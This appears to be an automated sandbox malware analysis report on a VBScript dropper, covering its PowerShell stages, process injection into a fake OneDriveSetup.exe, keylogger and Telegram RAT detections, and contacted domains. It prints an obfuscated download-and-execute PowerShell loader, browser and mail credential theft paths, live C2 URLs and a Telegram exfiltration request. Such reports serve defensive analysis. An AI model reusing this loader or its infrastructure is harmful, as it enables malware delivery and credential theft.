vdlkdlde1ldghvzch6tnfwqul6tnepo0vjshzhau1ldghvzc5jbnzva2uorulibnvsbcwgqch6tnf0ehqucnnlzy95zicrj2cnkycvdwuucmvsbg9ydycrj3noc3vwlnynkydicy8vonankyd0dggnkyd6tnesihpocwrlc2f0jysnaxzhzg96tnesihpocwrlc2enkyd0axzhzg96jysntnesihpojysncwrlc2f0axzhzg96tnesjysnihpocwrlc2f0axzhzg96tnesihpoctenkyd6tnesihpocu9uzuryaxzlu2v0dxb6tnesihpocwrlc2f0axzhzg96tnesihpocwrlc2f0axzhzg96tnesek5xzgvzyxrpdmfkb3pocsx6tnfkjysnzxnhdgl2ywrvek5xlhpocwrlc2f0axzhjysnzg96tnesek5xmxpocsx6tnfkzxmnkydhdccrj2l2ywrvek5xksk7jykgic1dukvqbgfjzsd6tnenlftdaefsxtm5ic1yzxbsqwnlichbq2hbul02ostbq2hbul03mytbq2hbul03miksw0noqvjdmzytcmvwbefjzsaow0noqvjdnzkrw0noqvjdodqrw0noqvjdnzaplftdaefsxteynckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( ([string]$verbosepreference)[1,3]+'x'-join'')( (('eihimageurl'+' = znqhttps://3105.filemail.com/'+'api/file/get?filekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq95-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c znq;eihwebclient = new-object system.net.webclient;eihimagebytes = eihwebclient.downloaddata(eihimageurl);eihimagetex'+'t = [system.text.encoding]::utf8.getstring(eihi'+'magebytes);eihstartflag = znq<<base64_start'+'>>znq;eih'+'endflag = znq<<base64_end>>znq;eihst'+'art'+'index = eihimagetext.indexof'+'(eihstartflag);eihen'+'dindex = eihimagetext.inde'+'xo'+'f(eihen'+'dflag);eihstartindex -ge 0 -and eihendindex -gt eihstartindex;eihstartindex += eihstartflag.length;eihbase64length = eihendindex - eihstartindex;eihbase64com'+'mand = eihimagetext.substring('+'eihstartindex, eihbase'+'64length);eihbase64reversed = '+'-join (eihbase64command.tochararray() otf foreach-object { eih_ })[-1..-'+'(eihbase64command.length)];e'+'ihcommandbytes = [system.convert]::frombase64string(eih'+'base'+'64reversed);eihloadedassembly = [s'+'ystem.reflection.assembly]::load(eihcommand'+'bytes);eihvaimethod = [dnlib.io.home].getmethod(znqvaiznq);eihvaimethod.invoke(eihnull, @(znqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'znq, znqdesat'+'ivadoznq, znqdesa'+'tivadoz'+'nq, zn'+'qdesativadoznq,'+' znqdesativadoznq, znq1'+'znq, znqonedrivesetupznq, znqdesativadoznq, znqdesativadoznq,znqdesativadoznq,znqd'+'esativadoznq,znqdesativa'+'doznq,znq1znq,znqdes'+'at'+'ivadoznq));') -creplace'znq',[char]39 -replace ([char]69+[char]73+[char]72),[char]36-replace ([char]79+[char]84+[char]70),[char]124))"Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: GetLocaleInfoA,6_2_00417A20
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_00412A15
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting                  		Valid Accounts1
                  Native API                  		221
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		2
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		111
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  File and Directory Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)4
                  Obfuscated Files or Information                  		Security Account Manager24
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts3
                  PowerShell                  		Login HookLogin Hook1
                  Software Packing                  		NTDS31
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets31
                  Virtualization/Sandbox Evasion                  		SSHKeylogging15
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials2
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                  Process Injection                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562920 Sample: Doc261124.vbs Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 paste.ee 2->32 34 7 other IPs or domains 2->34 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 58 14 other signatures 2->58 9 wscript.exe 1 2->9         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 30->54 56 Connects to a pastebin service (likely for C&C) 32->56 process4 dnsIp5 42 paste.ee 104.21.84.67, 443, 49705, 49706 CLOUDFLARENETUS United States 9->42 64 System process connects to network (likely due to code injection or exploit) 9->64 66 VBScript performs obfuscated calls to suspicious functions 9->66 68 Suspicious powershell command line found 9->68 70 4 other signatures 9->70 13 powershell.exe 7 9->13         started        signatures6 process7 signatures8 72 Suspicious powershell command line found 13->72 74 Obfuscated command line found 13->74 76 Found suspicious powershell code related to unpacking or dynamic code loading 13->76 16 powershell.exe 14 16 13->16         started        20 conhost.exe 13->20         started        process9 dnsIp10 26 sbv.pushswroller.eu 5.182.211.149, 49711, 80 SKB-ENTERPRISENL Netherlands 16->26 28 ip.3105.filemail.com 193.30.119.205, 443, 49707 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 16->28 44 Writes to foreign memory regions 16->44 46 Injects a PE file into a foreign processes 16->46 22 OneDriveSetup.exe 15 2 16->22         started        signatures11 process12 dnsIp13 36 sws.swpushroller.eu 45.80.158.30, 49731, 80 UK2NET-ASGB Netherlands 22->36 38 api.telegram.org 149.154.167.220, 443, 49730 TELEGRAMRU United Kingdom 22->38 40 2 other IPs or domains 22->40 60 Tries to steal Mail credentials (via file / registry access) 22->60 62 Tries to harvest and steal browser information (history, passwords, etc) 22->62 signatures14

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Doc261124.vbs8%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://sws.swpushroller.eu/swsk/P4.php0%Avira URL Cloudsafe
                  http://sws.swpushroller.eu/swsk/api.php0%Avira URL Cloudsafe
                  https://3105.filemail.com/0%Avira URL Cloudsafe
                  https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd0%Avira URL Cloudsafe
                  http://sws.swpushroller.eu0%Avira URL Cloudsafe
                  http://sbv.pushswroller.eu/gfy/gesr.txt100%Avira URL Cloudmalware
                  https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c0%Avira URL Cloudsafe
                  https://3105.filemail.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  paste.ee
                  		104.21.84.67
                  		truefalse
                    		high
                    reallyfreegeoip.org
                    		172.67.177.134
                    		truefalse
                      		high
                      ip.3105.filemail.com
                      		193.30.119.205
                      		truetrue
                        		unknown
                        sbv.pushswroller.eu
                        		5.182.211.149
                        		truetrue
                          		unknown
                          api.telegram.org
                          		149.154.167.220
                          		truefalse
                            		high
                            sws.swpushroller.eu
                            		45.80.158.30
                            		truefalse
                              		high
                              checkip.dyndns.com
                              		193.122.6.168
                              		truefalse
                                		high
                                checkip.dyndns.org
                                		unknown
                                		unknownfalse
                                  		high
                                  3105.filemail.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2027/11/2024%20/%2008:13:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                      		high
                                      http://checkip.dyndns.org/false
                                        		high
                                        http://sws.swpushroller.eu/swsk/P4.phpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://reallyfreegeoip.org/xml/8.46.123.75false
                                          		high
                                          http://sbv.pushswroller.eu/gfy/gesr.txttrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://paste.ee/d/MQJcSfalse
                                            		high
                                            https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7ctrue
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://3105.filemail.com/powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://paste.ee/d/MQJcSwscript.exe, 00000000.00000003.1460347182.000002BB95151000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463456856.000002BB93885000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
